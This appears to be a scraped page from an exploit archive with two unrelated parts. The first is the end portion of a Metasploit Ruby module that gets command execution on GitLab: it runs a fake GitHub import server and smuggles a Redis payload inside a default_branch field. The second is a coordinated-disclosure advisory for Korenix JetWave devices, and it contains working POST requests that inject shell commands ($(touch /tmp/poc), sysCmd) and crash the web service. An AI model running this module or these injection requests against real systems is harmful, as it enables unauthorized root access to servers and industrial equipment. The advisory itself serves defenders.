references,<br /> info: [version]<br /> )<br /> return CheckCode::Appears("Detected GitLab version #{version} which is vulnerable.")<br /> rescue Msf::Exploit::Remote::HTTP::Gitlab::Error::AuthenticationError<br /> return CheckCode::Detected('Could not detect the version because authentication failed.')<br /> rescue Msf::Exploit::Remote::HTTP::Gitlab::Error => e<br /> return CheckCode::Unknown("#{e.class} - #{e.message}")<br /> end<br /><br /> def cleanup<br /> super<br /> return unless @import_id<br /><br /> gitlab_delete_group(@group_id, api_token)<br /> gitlab_revoke_personal_access_token(api_token)<br /> gitlab_sign_out<br /> rescue Msf::Exploit::Remote::HTTP::Gitlab::Error => e<br /> print_error("#{e.class} - #{e.message}")<br /> end<br /><br /> def exploit<br /> if Rex::Socket.is_internal?(srvhost_addr)<br /> print_warning("#{srvhost_addr} is an internal address and will not work unless the target GitLab instance is using a non-default configuration.")<br /> end<br /><br /> setup_repo_structure<br /> start_service({<br /> 'Uri' => {<br /> 'Proc' => proc do |cli, req|<br /> on_request_uri(cli, req)<br /> end,<br /> 'Path' => '/'<br /> }<br /> })<br /> execute_command(payload.encoded)<br /> rescue Timeout::Error => e<br /> fail_with(Failure::TimeoutExpired, e.message)<br /> end<br /><br /> def execute_command(cmd, _opts = {})<br /> vprint_status("Executing command: #{cmd}")<br /> # due to the AutoCheck mixin and the keep_cookies option, the cookie might be already set<br /> self.cookie = gitlab_sign_in(datastore['USERNAME'], datastore['PASSWORD']) unless cookie<br /> vprint_status("Session ID: #{session_id}")<br /> vprint_status("Creating group #{group_name}")<br /> # We need group id for the cleanup method<br /> @group_id = gitlab_create_group(group_name, api_token)['id']<br /> fail_with(Failure::UnexpectedReply, 'Failed to create a new group') unless @group_id<br /> @redis_payload = redis_payload(cmd)<br /> # import a repository from GitHub<br /> vprint_status('Importing a repository from GitHub')<br /> @import_id = gitlab_import_github_repo(<br /> group_name: group_name,<br /> github_hostname: get_uri,<br /> api_token: api_token<br /> )['id']<br /><br /> fail_with(Failure::UnexpectedReply, 'Failed to import a repository from GitHub') unless @import_id<br /> # wait for the import tasks to finish<br /> select(nil, nil, nil, datastore['IMPORT_DELAY'])<br /> # execute the payload<br /> send_request_cgi({<br /> 'uri' => normalize_uri(target_uri.path, group_name),<br /> 'method' => 'GET',<br /> 'keep_cookies' => false,<br /> 'cookie' => "_gitlab_session=#{session_id}"<br /> })<br /> rescue Msf::Exploit::Remote::HTTP::Gitlab::Error => e<br /> fail_with(Failure::Unknown, "#{e.class} - #{e.message}")<br /> end<br /><br /> def setup_repo_structure<br /> blob_object_fname = "#{Rex::Text.rand_text_alpha(5..10)}.txt"<br /> blob_data = Rex::Text.rand_text_alpha(5..12)<br /> blob_object = Msf::Exploit::Git::GitObject.build_blob_object(blob_data)<br /><br /> tree_data =<br /> {<br /> mode: '100644',<br /> file_name: blob_object_fname,<br /> sha1: blob_object.sha1<br /> }<br /> tree_object = Msf::Exploit::Git::GitObject.build_tree_object(tree_data)<br /><br /> commit_obj = Msf::Exploit::Git::GitObject.build_commit_object(tree_sha1: tree_object.sha1)<br /><br /> git_objs = [ commit_obj, tree_object, blob_object ]<br /><br /> @refs =<br /> {<br /> 'HEAD' => 'refs/heads/main',<br /> 'refs/heads/main' => commit_obj.sha1<br /> }<br /> @packfile = Msf::Exploit::Git::Packfile.new('2', git_objs)<br /> end<br /><br /> # Handle incoming requests from GitLab server<br /> def on_request_uri(cli, req)<br /> super<br /> headers = { 'Content-Type' => 'application/json' }<br /> data = {}.to_json<br /> case req.uri<br /> when %r{/api/v3/rate_limit}<br /> headers.merge!({<br /> 'X-RateLimit-Limit' => '100000',<br /> 'X-RateLimit-Remaining' => '100000'<br /> })<br /> when %r{/api/v3/repositories/(\w{1,20})}<br /> id = Regexp.last_match(1)<br /> name = Rex::Text.rand_text_alpha(8..12)<br /> data = {<br /> id: id,<br /> name: name,<br /> full_name: "#{name}/name",<br /> clone_url: "#{get_uri.gsub(%r{/+$}, '')}/#{name}/public.git"<br /> }.to_json<br /> when %r{/\w+/public.git/info/refs}<br /> data = build_pkt_line_advertise(@refs)<br /> headers.merge!({ 'Content-Type' => 'application/x-git-upload-pack-advertisement' })<br /> when %r{/\w+/public.git/git-upload-pack}<br /> data = build_pkt_line_sideband(@packfile)<br /> headers.merge!({ 'Content-Type' => 'application/x-git-upload-pack-result' })<br /> when %r{/api/v3/repos/\w+/\w+}<br /> bytes_size = rand(3..8)<br /> data = {<br /> 'default_branch' => {<br /> 'to_s' => {<br /> 'bytesize' => bytes_size,<br /> 'to_s' => "+#{Rex::Text.rand_text_alpha_lower(bytes_size)}\r\n#{@redis_payload}"<br /> # using a simple string format for RESP<br /> }<br /> }<br /> }.to_json<br /> end<br /> send_response(cli, data, headers)<br /> end<br />end<br /></code></pre>
<pre><code>CyberDanube Security Research 20230213-0<br />-------------------------------------------------------------------------------<br /> title| Multiple Vulnerabilities<br /> product| JetWave4221 HP-E, JetWave 2212G, JetWave <br />2212X/2212S,<br /> | JetWave 2211C, JetWave 2411/2111, JetWave <br />2411L/2111L,<br /> | JetWave 2414/2114, JetWave 2424, JetWave 2460,<br /> | JetWave 3220/3420 V3<br /> vulnerable version| See "Vulnerable Versions"<br /> fixed version| See "Solution"<br /> CVE number| requested<br /> impact| High<br /> homepage| https://korenix.com/<br /> found| 2022-11-28<br /> by| S. Dietz, T. Weber (Office Vienna)<br /> | CyberDanube Security Research<br /> | Vienna | St. Pölten<br /> |<br /> | https://www.cyberdanube.com<br />-------------------------------------------------------------------------------<br /><br /><br />Vendor description<br />-------------------------------------------------------------------------------<br />"Korenix Technology, a Beijer group company within the Industrial <br />Communication<br />business area, is a global leading manufacturer providing innovative, <br />market-<br />oriented, value-focused Industrial Wired and Wireless Networking Solutions.<br />[...]<br />Our products are mainly applied in SMART industries: Surveillance, Machine-<br />to-Machine, Automation, Remote Monitoring, andTransportation. Worldwide<br />customer base covers different Sales channels, including end-customers, <br />OEMs,<br />system integrators, and brand label partners."<br /><br />Source:<br />https://www.korenix.com/en/about/index.aspx?kind=3<br /><br /><br />Vulnerable Versions:<br />-------------------------------------------------------------------------------<br />The following firmware versions have been found to be vulnerable by<br />CyberDanube:<br /> * Korenix JetWave4221 HP-E <= V1.3.0<br /> * Korenix JetWave 3220/3420 V3 < V1.7<br /><br />The following firmware versions have been identified to be vulnerable by the<br />vendor:<br /> * Korenix JetWave 2212G V1.3.T<br /> * Korenix JetWave 2212X/2112S V1.3.0<br /> * Korenix JetWave 2211C < V1.6<br /> * Korenix JetWave 2411/2111 < V1.5<br /> * Korenix JetWave 2411L/2111L < V1.6<br /> * Korenix JetWave 2414/2114 < V1.4<br /> * Korenix JetWave 2424 < V1.3<br /> * Korenix JetWave 2460 < V1.6<br /><br /><br />Vulnerability overview<br />-------------------------------------------------------------------------------<br />1) Authenticated Command Injection<br />The web server of the device is prone to an authenticated command injection.<br />It allows an attacker to gain full access to the underlying operating <br />system of<br />the device with all implications. If such a device is acting as key <br />device in<br />an industrial network, or controls various critical equipment via serial <br />ports,<br />more extensive damage in the corresponding network can be done by an <br />attacker.<br /><br />2) Authenticated Denial of Web-Service<br />When logged in, a user can issue a POST request such that the underlying <br />binary<br />exits. The Web-Service becomes unavailable and cannot be accessed until the<br />device gets rebooted.<br /><br /><br />Proof of Concept<br />-------------------------------------------------------------------------------<br />1) Authenticated Command Injection<br />1.a)<br />The command "touch /tmp/poc" was injected to the system by using the <br />following<br />POST request:<br />===============================================================================<br />POST /goform/formTFTPLoadSave HTTP/1.1<br />Host: 172.16.0.38<br />User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:107.0) <br />Gecko/20100101 Firefox/107.0<br />Accept: <br />text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8<br />Accept-Language: en-US,en;q=0.5<br />Accept-Encoding: gzip, deflate<br />Content-Type: application/x-www-form-urlencoded<br />Content-Length: 127<br />Origin: http://172.16.0.38<br />Connection: close<br />Referer: http://172.16.0.38/mgmtsaveconf.asp<br />Cookie: <br />-common-web-session-=::webs.session::d7af70f81033cff3828902e476ceda45<br />Upgrade-Insecure-Requests: 1<br /><br />submit-url=%2Fmgmtsaveconf.asp&ip_address=192.168.1.1&file_name=%24%28touch+%2Ftmp%2Fpoc%29&tftp_action=load&tftp_config=Submit<br />=============================================================================== <br /><br /><br />The command gets executed as root and a file under the folder /tmp/ is <br />created.<br /><br />1.b)<br />The command "touch /tmp/poc2" was injected to the system by using the <br />following<br />POST request:<br />===============================================================================<br />POST /goform/formSysCmd HTTP/1.1<br />Host: 172.16.0.38<br />Content-Type: application/x-www-form-urlencoded<br />Connection: close<br />Referer: 172.16.0.38<br />Cookie: <br />-common-web-session-=::webs.session::df1307d508d798638a8b4572987462bb<br />Content-Length: 40<br /><br />sysCmd=touch%20/tmp/poc2&submit-url=<br />===============================================================================<br /><br />The command gets executed as root and a file under the folder /tmp/ is <br />created.<br />Command output is written into /tmp/syscmd.<br /><br /><br />2) Authenticated Denial of Web-Service<br />The process goahead chrashes when the following POST request is sent to the<br />endpoint /goform/formDefault:<br />===============================================================================<br />POST /goform/formDefault HTTP/1.1<br />Host: 172.16.0.38<br />User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:107.0) <br />Gecko/20100101 Firefox/107.0<br />Accept: <br />text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8<br />Accept-Language: en-US,en;q=0.5<br />Accept-Encoding: gzip, deflate<br />Content-Type: application/x-www-form-urlencoded<br />Content-Length: 62<br />Origin: http://172.16.0.38<br />Connection: close<br />Referer: http://172.16.0.38/toolping.asp<br />Cookie: <br />-common-web-session-=::webs.session::3c624961199904f380e978a3967cc356<br />Upgrade-Insecure-Requests: 1<br /><br />PingIPAddress=127.0.0.1&submit-url=%2Ftoolping.asp&Submit=Ping<br />=============================================================================== <br /><br /><br />The output was observed on the terminal using our emulated instance:<br />=============================================================================== <br /><br />rm: invalid option -- /<br />BusyBox v1.01 (2022.10.21-00:22+0000) multi-call binary<br />Usage: rm [OPTION]... FILE...<br /><br />Remove (unlink) the FILE(s). You may use '--' to<br />indicate that all following arguments are non-options.<br /><br />Options:<br /> -i always prompt before removing each destination<br /> -f remove existing destinations, never prompt<br /> -r or -R remove the contents of directories recursively<br /><br />killall: wlwatchdog: no process killed<br />killall: wlapwatchdog: no process killed<br />=============================================================================== <br /><br /><br />The vulnerabilities were manually verified on an emulated device by <br />using the<br />MEDUSA scalable firmware runtime (https://medusa.cyberdanube.com).<br /><br /><br />Solution<br />-------------------------------------------------------------------------------<br />Owner of these products are suggested to update to the following versions:<br /> * Korenix JetWave 4221 HP-E V1.4.0<br /> * Korenix JetWave 2212G V1.10<br /> * Korenix JetWave 2212X/2112S V1.11<br /> * Korenix JetWave 2211C V1.6<br /> * Korenix JetWave 2411/2111 V1.5<br /> * Korenix JetWave 2411L/2111L V1.6<br /> * Korenix JetWave 2414/2114 V1.4<br /> * Korenix JetWave 2424 V1.3<br /> * Korenix JetWave 2460 V1.6<br /> * Korenix JetWave 3220/3420 V3 V1.7<br /><br /><br />Recommendation<br />-------------------------------------------------------------------------------<br />CyberDanube recommends customers from Korenix to upgrade the firmware to the<br />latest version available. Furthermore, a full security review by <br />professionals<br />is recommended.<br /><br /><br />Contact Timeline<br />-------------------------------------------------------------------------------<br />2022-12-05: Contacting Beijer Electronics Group via cs@beijerelectronics.com<br />2022-12-12: Meeting with Beijer Electronics. Vulnerabilities were <br />confirmed by<br /> the vendor. The vendor planned to fix the vulnerabilities <br />in the<br /> next 1.5 months.<br />2023-01-04: Contact shared the updated firmware version. CyberDanube checked<br /> if the vulnerabilities got fixed. The contact communicated <br />that<br /> not only JetWave4221 is vulnerable to these issues. Therefore,<br /> CyberDanube postponed the release of the Advisory until the <br />other<br /> products have been patched.<br />2023-01-30: Meeting with Beijer Electronics. Customer get informed about the<br /> issues. Fixes got published. Disclosure date got shifted to<br /> 2023-02-13 to provide a time-window for patching.<br />2023-02-13: Coordinated release of security advisory.<br /><br /><br />Web: https://www.cyberdanube.com<br />Twitter: https://twitter.com/cyberdanube<br />Mail: research at cyberdanube dot com<br /><br />EOF S. Dietz, T. Weber / @2023<br /><br /><br /></code></pre>